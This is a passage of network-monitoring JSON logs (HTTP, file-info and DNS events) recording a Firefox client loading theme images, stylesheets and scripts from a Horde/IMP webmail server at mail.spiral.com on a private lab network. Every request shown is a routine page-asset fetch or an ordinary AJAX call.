Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":4}} {"timestamp":"2020-02-29T00:01:17.365830+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:01:17.380340+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":5}} {"timestamp":"2020-02-29T00:01:17.380862+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:01:17.380615+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":6}} {"timestamp":"2020-02-29T00:01:17.380967+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:01:17.383893+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":6}} {"timestamp":"2020-02-29T00:01:17.384497+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:01:17.386531+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":7}} 
{"timestamp":"2020-02-29T00:01:17.387940+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:01:17.389643+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":7}} {"timestamp":"2020-02-29T00:01:17.390218+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":8}} {"timestamp":"2020-02-29T00:01:17.395134+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:01:17.396041+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:01:17.396672+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":8}} {"timestamp":"2020-02-29T00:01:17.397130+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.398639+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":9}} 
{"timestamp":"2020-02-29T00:01:17.405089+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:01:17.411548+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:01:17.412209+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":9}} 
{"timestamp":"2020-02-29T00:01:17.412923+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:01:17.421392+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56244,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5592,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:17.442042+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:01:17.446781+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":10}} {"timestamp":"2020-02-29T00:01:17.526761+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56244,"proto":"UDP","dns":{"type":"answer","id":5592,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:17.526761+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56244,"proto":"UDP","dns":{"type":"answer","id":5592,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:17.619055+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:01:17.619055+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.654438+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.655898+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:01:17.656035+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":10}} {"timestamp":"2020-02-29T00:01:17.658172+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":12}} {"timestamp":"2020-02-29T00:01:17.672130+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} 
{"timestamp":"2020-02-29T00:01:17.674459+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":13}} {"timestamp":"2020-02-29T00:01:17.683138+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:01:17.685104+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} 
{"timestamp":"2020-02-29T00:01:17.685273+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":14}} {"timestamp":"2020-02-29T00:01:17.686251+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:01:17.686434+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.688181+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:01:17.688705+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":15}} 
{"timestamp":"2020-02-29T00:01:17.689101+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":12}} {"timestamp":"2020-02-29T00:01:17.689842+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} {"timestamp":"2020-02-29T00:01:17.690769+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} 
{"timestamp":"2020-02-29T00:01:17.691700+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":13}} 